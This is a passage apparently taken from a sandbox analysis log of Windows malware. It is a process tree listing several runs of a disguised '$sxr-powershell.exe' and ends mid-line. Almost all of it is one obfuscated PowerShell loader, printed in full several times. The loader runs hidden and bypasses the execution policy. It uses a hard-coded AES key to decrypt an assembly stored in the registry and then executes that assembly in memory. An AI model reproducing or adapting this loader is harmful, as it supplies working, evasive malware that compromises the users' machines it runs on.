$zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        19⤵
        
        PID:7884
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4308).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        19⤵
        
        PID:8048
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4308).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        19⤵
        
        PID:8184
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4308).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = 